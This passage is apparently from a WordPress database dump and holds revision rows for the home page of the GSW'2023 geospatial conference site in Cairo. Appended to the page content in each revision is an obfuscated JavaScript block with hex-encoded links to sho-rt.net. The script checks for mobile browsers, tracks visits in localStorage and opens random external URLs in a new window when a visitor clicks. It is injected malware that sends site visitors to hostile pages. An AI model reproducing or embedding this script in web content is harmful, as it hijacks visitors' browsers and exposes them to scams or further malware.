_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 18:24:25','2022-11-09 18:24:25','',3066,'https://gsw2023.com/?p=3185',0,'revision','',0),
(3186,1,'2022-11-09 18:25:10','2022-11-09 18:25:10','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\n<h2><strong> EGYPT GSW\'2023</strong></h2>\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\n<h3></h3>\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\n\n[/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 18:25:10','2022-11-09 18:25:10','',3066,'https://gsw2023.com/?p=3186',0,'revision','',0),
(3187,1,'2022-11-09 18:25:38','2022-11-09 18:25:38','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\n<h2><strong> EGYPT GSW\'2023</strong></h2>\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\n<h3></h3>\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" 